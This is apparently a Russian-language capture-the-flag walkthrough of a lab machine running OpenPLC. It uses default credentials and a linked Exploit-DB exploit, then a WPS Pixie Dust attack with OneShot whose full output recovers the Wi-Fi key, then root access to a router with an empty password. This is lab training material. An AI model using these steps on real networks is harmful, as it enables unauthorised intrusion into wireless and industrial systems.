Telegram / Boosty / Видео

Подпишись на канал t.me/kiberdruzhinnik, чтобы не пропускать контент.

Смотри на t.me/kiberdruzhinnik/273.

Также на https://boosty.to/kiberdruzhinnik/posts/feb891b8-93c3-4663-ba15-d29fe129b0e4 я опубликовал подробный видео разбор этой задачи. Это может быть полезно для обучения, если вы делаете первые шаги в информационной безопасности. Поддержать меня на Boosty.

Просканируем порты машины с помощью rustscan:

Open 10.129.127.49:22
Open 10.129.127.49:8080

Веб

Нас встречает веб-версия OpenPLC.

alt text

Используем учетные данные по умолчанию и попадаем в админку, что позволяет нам воспользоваться эксплоитом https://www.exploit-db.com/exploits/49803.

alt text

alt text

Флаг пользователя

alt text

Повышение привилегий

Мы должны двигаться в сторону подключения сетевого интерфейса wlan0 к сети plcrouter.

$ iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA"
< | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA"
BSS 02:00:00:00:01:00(on wlan0)
 SSID: plcrouter
   * Authentication suites: PSK
   * SSID List
 WPS:  * Version: 1.0

На удаленной машине воспользуемся утилитой OneShot для атаки Pixie Dust:

$ python3 oneshot.py -i wlan0 -K
[*] Running wpa_supplicant…
[*] BSSID not specified (--bssid) — scanning for available networks
Network marks: Possibly vulnerable | WPS locked | Already stored
Networks list:
#    BSSID              ESSID                     Sec.     PWR  WSC device name             WSC model
1)   02:00:00:00:01:00  plcrouter                 WPA2     -30                                 
Select target (press Enter to refresh): 1
> 1
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[P] E-Nonce: 1DAC8A5280D145FF3456FBFCB0E4609D
[*] Sending WPS Message M2…
[P] PKR: BAD477AFB06BB77F79CAD309397CDD39E32B90E3844FF9787E705A0259D88E0DA2BCACF4B05D470D5934CCAFB9A71D82E5BC261EB57EEFEFFF7860AF8060FDC4211F79D9C859BF8A461A995950DDDAD01A528634BED5F669432AE6E0369D0EACD222000F8184EAF3239709C89B93A39A970D904795837342A1DAEF481EE32386354E09D3F6E7204A71D17170DD82D66DB02DA828CB80D39CD0EB945414ADD1891C3679724F6BACD148475219D8231B2C73EBB3326D4B9CD7D128F928CAA42189
[P] PKE: B0CA7FC68CEAEC15A5E9024095F98FD71805ABF7A62BF46209A1F1EED95126B1949CEF203B711C5BE4AF4958C886DE867E6EC4ECB08F1033FE71787D7CECEDC2A2A6D14F6345FDE01407B0C8C105373E6A82A9E30625976621B8882B19A11FDBED89F59B3D6B1C39D1445728325DD41AA9E7F095729D43DC8BE4E8F18392B93DEAB87CDF6A9BAAA837287D8F419ED955295346B13CD4A4DB4B744415EE806418FFA41B709A97D9E76B0CD37BAA7360AB256262AD92768463D51657E909015A02
[P] AuthKey: E9286E1AF6549FDF9A2DC27DC9940A20B5C97284E739BF3DFCCE410F90327937
[*] Received WPS Message M3
[P] E-Hash1: A03FDEDA0BD6DEB0EBF1F4D0A74AB31FFD2B4AE1C9A02831CF7025CA0C85329E
[P] E-Hash2: 496D89096B87BACEAAAC755E934DA4965BC9C2ED046F5138004282933A0300CD
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'pwd'
[+] AP SSID: 'plcrouter'

Сразу же получили пароль от Wi-Fi сети plcrouter.

Осуществим подключение к сети с помощью гайда.

Просканируем внутреннюю сеть 192.168.1.1/24 и обнаружим роутер с пустым паролем. После проброса SSH порта подключаемся как root и забираем флаг.

Флаг суперпользователя

alt text